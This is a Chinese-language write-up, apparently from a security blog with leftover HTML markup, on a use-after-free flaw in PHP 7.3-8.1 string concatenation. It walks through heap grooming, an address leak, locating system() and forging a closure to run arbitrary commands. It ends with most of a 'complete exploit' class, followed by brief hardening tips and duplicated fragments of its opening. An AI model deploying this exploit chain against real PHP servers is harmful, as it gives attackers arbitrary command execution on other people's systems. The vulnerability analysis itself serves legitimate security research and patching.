PHP字符串连接操作UAF漏洞分析与利用<\/h1>

漏洞概述<\/h2>
PHP 7.3-8.1版本中存在一个由于字符串连接操作(concat)导致的Use-After-Free(UAF)漏洞。当连接操作的参数为数组时会触发错误处理，如果在错误处理回调中删除了相关资源，会造成UAF条件。<\/p>

漏洞原理<\/h2>

触发条件<\/h3>
$my_var =<\/span> str_repeat<\/span>("a"<\/span>, 1<\/span>);
<\/span><\/span>set_error_handler<\/span>(function<\/span>() use<\/span> (&<\/span>$my_var) {
<\/span><\/span>    echo<\/span>("error<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    $my_var =<\/span> 0x123<\/span>;
<\/span><\/span>});
<\/span><\/span>$my_var .=<\/span> [0<\/span>];
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>


错误处理流程<\/strong>：<\/p>

当执行$my_var .= [0]<\/code>时，PHP尝试将数组转换为字符串<\/li>
由于数组不能直接转换为字符串，触发错误处理<\/li>
在错误处理回调中修改了$my_var<\/code>的值，导致原始字符串资源被释放<\/li>
<\/ul>
<\/li>

内存管理细节<\/strong>：<\/p>

PHP使用zend_mm<\/code>内存管理器，采用大小规格(small\/large\/huge)分配策略<\/li>
字符串和数组结构可能分配到相同大小的内存块<\/li>
释放后的内存块被放入空闲链表，可能被后续分配重用<\/li>
<\/ul>
<\/li>

UAF形成<\/strong>：<\/p>

错误处理中释放了原始字符串的内存<\/li>
后续操作仍可能访问已释放的内存区域<\/li>
通过精心构造可以控制释放后的内存内容<\/li>
<\/ul>
<\/li>
<\/ol>
利用技术<\/h2>
利用步骤<\/h3>

堆风水(Heap Feng Shui)<\/strong>：

预先分配和释放特定大小的内存块<\/li>
控制堆布局使目标对象分配到特定位置<\/li>
<\/ul>
<\/li>
<\/ol>
for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> 10<\/span>; $i++<\/span>) {
<\/span><\/span>    $groom[] =<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>STRING_SIZE<\/span>);
<\/span><\/span>    $groom[] =<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>HT_STRING_SIZE<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
触发UAF<\/strong>：

通过字符串连接操作触发错误处理<\/li>
在回调中释放目标对象并分配可控数据<\/li>
<\/ul>
<\/li>
<\/ol>
$arr =<\/span> [[], []];
<\/span><\/span>set_error_handler<\/span>(function<\/span>() use<\/span> (&<\/span>$arr, &<\/span>$buf) {
<\/span><\/span>    $arr =<\/span> 2<\/span>;
<\/span><\/span>    $buf =<\/span> str_repeat<\/span>("<\/span>\x00<\/span>"<\/span>, self<\/span>::<\/span>HT_STRING_SIZE<\/span>);
<\/span><\/span>});
<\/span><\/span>$arr[1<\/span>] .=<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>STRING_SIZE<\/span> -<\/span> strlen<\/span>("Array"<\/span>));
<\/span><\/span><\/code><\/pre>
信息泄露<\/strong>：

利用释放后重用读取关键数据结构地址<\/li>
包括对象句柄、类指针、函数表等<\/li>
<\/ul>
<\/li>
<\/ol>
private<\/span> function<\/span> rel_read<\/span>($offset) {
<\/span><\/span>    return<\/span> self<\/span>::<\/span>str2ptr<\/span>($this-><\/span>abc<\/span>, $offset);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
函数地址解析<\/strong>：

通过模块结构遍历找到标准函数表<\/li>
定位关键函数如system()<\/code>的地址<\/li>
<\/ul>
<\/li>
<\/ol>
private<\/span> function<\/span> get_system<\/span>($basic_funcs) {
<\/span><\/span>    $addr =<\/span> $basic_funcs;
<\/span><\/span>    do<\/span> {
<\/span><\/span>        $f_entry =<\/span> $this-><\/span>read<\/span>($addr);
<\/span><\/span>        $f_name =<\/span> $this-><\/span>read<\/span>($f_entry, 6<\/span>);
<\/span><\/span>        if<\/span>($f_name ===<\/span> 0x6d6574737973<\/span>) { \/\/ "system"
<\/span><\/span><\/span><\/span>            return<\/span> $this-><\/span>read<\/span>($addr +<\/span> 8<\/span>);
<\/span><\/span>        }
<\/span><\/span>        $addr +=<\/span> 0x20<\/span>;
<\/span><\/span>    } while<\/span>($f_entry !==<\/span> 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
伪造闭包对象<\/strong>：

复制原始闭包结构到可控内存区域<\/li>
修改关键字段如处理函数指针<\/li>
<\/ul>
<\/li>
<\/ol>
$fake_closure_off =<\/span> 0x70<\/span>;
<\/span><\/span>for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> 0x138<\/span>; $i +=<\/span> 8<\/span>) {
<\/span><\/span>    $this-><\/span>rel_write<\/span>($fake_closure_off +<\/span> $i, $this-><\/span>read<\/span>($closure_addr +<\/span> $i));
<\/span><\/span>}
<\/span><\/span>$this-><\/span>rel_write<\/span>($fake_closure_off +<\/span> $handler_offset, $zif_system);
<\/span><\/span><\/code><\/pre>
执行任意命令<\/strong>：

通过修改后的闭包对象调用目标函数<\/li>
实现任意命令执行<\/li>
<\/ul>
<\/li>
<\/ol>
($this-><\/span>helper<\/span>-><\/span>b<\/span>)($cmd);
<\/span><\/span><\/code><\/pre>关键数据结构<\/h3>


zend_string结构<\/strong>：<\/p>
struct<\/span> _zend_string {
<\/span><\/span>    zend_refcounted_h gc;
<\/span><\/span>    zend_ulong h;      \/\/ hash value
<\/span><\/span><\/span><\/span>    size_t len;
<\/span><\/span>    char<\/span> val[1<\/span>];
<\/span><\/span>};
<\/span><\/span><\/code><\/pre><\/li>

zend_object结构<\/strong>：<\/p>
struct<\/span> _zend_object {
<\/span><\/span>    zend_refcounted_h gc;
<\/span><\/span>    uint32_t<\/span> handle;
<\/span><\/span>    zend_class_entry *<\/span>ce;
<\/span><\/span>    const<\/span> zend_object_handlers *<\/span>handlers;
<\/span><\/span>    HashTable *<\/span>properties;
<\/span><\/span>    zval properties_table[1<\/span>];
<\/span><\/span>};
<\/span><\/span><\/code><\/pre><\/li>

zend_closure结构<\/strong>：<\/p>
typedef<\/span> struct<\/span> _zend_closure {
<\/span><\/span>    zend_object std;
<\/span><\/span>    zend_function func;
<\/span><\/span>    zval this_ptr;
<\/span><\/span>    zend_class_entry *<\/span>called_scope;
<\/span><\/span>    zif_handler orig_internal_handler;
<\/span><\/span>} zend_closure;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
利用限制<\/h2>

PHP版本<\/strong>：仅影响PHP 7.3-8.1版本<\/li>
内存布局<\/strong>：依赖精确的堆布局控制<\/li>
防护机制<\/strong>：可能被ASLR等安全机制干扰<\/li>
<\/ol>
防护建议<\/h2>

及时升级到PHP安全版本<\/li>
禁用危险函数或使用disable_functions限制<\/li>
启用内存保护机制如ASLR、DEP<\/li>
<\/ol>
完整利用代码<\/h2>
class<\/span> Pwn<\/span> {
<\/span><\/span>    const<\/span> LOGGING<\/span> =<\/span> false<\/span>;
<\/span><\/span>    const<\/span> CHUNK_DATA_SIZE<\/span> =<\/span> 0x60<\/span>;
<\/span><\/span>    const<\/span> CHUNK_SIZE<\/span> =<\/span> ZEND_DEBUG_BUILD<\/span> ?<\/span> self<\/span>::<\/span>CHUNK_DATA_SIZE<\/span> +<\/span> 0x20<\/span> :<\/span> self<\/span>::<\/span>CHUNK_DATA_SIZE<\/span>;
<\/span><\/span>    const<\/span> STRING_SIZE<\/span> =<\/span> self<\/span>::<\/span>CHUNK_DATA_SIZE<\/span> -<\/span> 0x18<\/span> -<\/span> 1<\/span>;
<\/span><\/span>    const<\/span> HT_SIZE<\/span> =<\/span> 0x118<\/span>;
<\/span><\/span>    const<\/span> HT_STRING_SIZE<\/span> =<\/span> self<\/span>::<\/span>HT_SIZE<\/span> -<\/span> 0x18<\/span> -<\/span> 1<\/span>;
<\/span><\/span>
<\/span><\/span>    public<\/span> function<\/span> __construct($cmd) {
<\/span><\/span>        \/\/ 堆风水准备
<\/span><\/span><\/span><\/span>        for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> 10<\/span>; $i++<\/span>) {
<\/span><\/span>            $groom[] =<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>STRING_SIZE<\/span>);
<\/span><\/span>            $groom[] =<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>HT_STRING_SIZE<\/span>);
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/\/ 触发UAF并泄露信息
<\/span><\/span><\/span><\/span>        $concat_str_addr =<\/span> self<\/span>::<\/span>str2ptr<\/span>($this-><\/span>heap_leak<\/span>(), 16<\/span>);
<\/span><\/span>        $fill =<\/span> self<\/span>::<\/span>alloc<\/span>(self<\/span>::<\/span>STRING_SIZE<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 计算目标地址并释放
<\/span><\/span><\/span><\/span>        $abc_addr =<\/span> $concat_str_addr +<\/span> self<\/span>::<\/span>CHUNK_SIZE<\/span>;
<\/span><\/span>        $this-><\/span>free<\/span>($abc_addr);
<\/span><\/span>        
<\/span><\/span>        \/\/ 分配Helper对象到释放的空间
<\/span><\/span><\/span><\/span>        $this-><\/span>helper<\/span> =<\/span> new<\/span> Helper<\/span>;
<\/span><\/span>        if<\/span>(strlen<\/span>($this-><\/span>abc<\/span>) <<\/span> 0x1337<\/span>) {
<\/span><\/span>            self<\/span>::<\/span>log<\/span>("uaf failed"<\/span>);
<\/span><\/span>            return<\/span>;
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置Helper属性
<\/span><\/span><\/span><\/span>        $this-><\/span>helper<\/span>-><\/span>a<\/span> =<\/span> "leet"<\/span>;
<\/span><\/span>        $this-><\/span>helper<\/span>-><\/span>b<\/span> =<\/span> function<\/span>($x) {};
<\/span><\/span>        $this-><\/span>helper<\/span>-><\/span>c<\/span> =<\/span> 0xfeedface<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/\/ 读取关键地址
<\/span><\/span><\/span><\/span>        $helper_handlers =<\/span> $this-><\/span>rel_read<\/span>(0<\/span>);
<\/span><\/span>        $closure_addr =<\/span> $this-><\/span>rel_read<\/span>(0x20<\/span>);
<\/span><\/span>        $closure_ce =<\/span> $this-><\/span>read<\/span>($closure_addr +<\/span> 0x10<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 定位system函数
<\/span><\/span><\/span><\/span>        $basic_funcs =<\/span> $this-><\/span>get_basic_funcs<\/span>($closure_ce);
<\/span><\/span>        $zif_system =<\/span> $this-><\/span>get_system<\/span>($basic_funcs);
<\/span><\/span>        
<\/span><\/span>        \/\/ 伪造闭包对象
<\/span><\/span><\/span><\/span>        $fake_closure_off =<\/span> 0x70<\/span>;
<\/span><\/span>        for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> 0x138<\/span>; $i +=<\/span> 8<\/span>) {
<\/span><\/span>            $this-><\/span>rel_write<\/span>($fake_closure_off +<\/span> $i, $this-><\/span>read<\/span>($closure_addr +<\/span> $i));
<\/span><\/span>        }
<\/span><\/span>        $this-><\/span>rel_write<\/span>($fake_closure_off +<\/span> 0x38<\/span>, 1<\/span>, 4<\/span>);
<\/span><\/span>        $handler_offset =<\/span> PHP_MAJOR_VERSION<\/span> ===<\/span> 8<\/span> ?<\/span> 0x70<\/span> :<\/span> 0x68<\/span>;
<\/span><\/span>        $this-><\/span>rel_write<\/span>($fake_closure_off +<\/span> $handler_offset, $zif_system);
<\/span><\/span>        
<\/span><\/span>        \/\/ 执行命令
<\/span><\/span><\/span><\/span>        $fake_closure_addr =<\/span> $abc_addr +<\/span> $fake_closure_off +<\/span> 0x18<\/span>;
<\/span><\/span>        $this-><\/span>rel_write<\/span>(0x20<\/span>, $fake_closure_addr);
<\/span><\/span>        ($this-><\/span>helper<\/span>-><\/span>b<\/span>)($cmd);
<\/span><\/span>        
<\/span><\/span>        \/\/ 恢复原始闭包
<\/span><\/span><\/span><\/span>        $this-><\/span>rel_write<\/span>(0x20<\/span>, $closure_addr);
<\/span><\/span>        unset<\/span>($this-><\/span>helper<\/span>-><\/span>b<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 其他辅助方法...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
该漏洞利用PHP字符串连接操作的特殊错误处理路径，结合堆内存管理特性，实现了从UAF到任意代码执行的完整利用链。理解该漏洞需要对PHP内部数据结构、内存管理和函数调用机制有深入认识。防护此类漏洞需要及时更新PHP版本并实施适当的安全加固措施。<\/p>
PHP字符串连接操作UAF漏洞分析与利用<\/h1>

漏洞概述<\/h2> PHP 7.3-8.1版本中存在一个由于字符串连接操作(concat)导致的Use-After-Free(UAF)漏洞。当连接操作的参数为数组时会触发错误处理，如果在错误处理回调中删除了相关资源，会造成UAF条件。<\/p>

漏洞原理<\/h2>

利用技术<\/h2>

漏洞概述<\/h2>
PHP 7.3-8.1版本中存在一个由于字符串连接操作(concat)导致的Use-After-Free(UAF)漏洞。当连接操作的参数为数组时会触发错误处理，如果在错误处理回调中删除了相关资源，会造成UAF条件。<\/p>
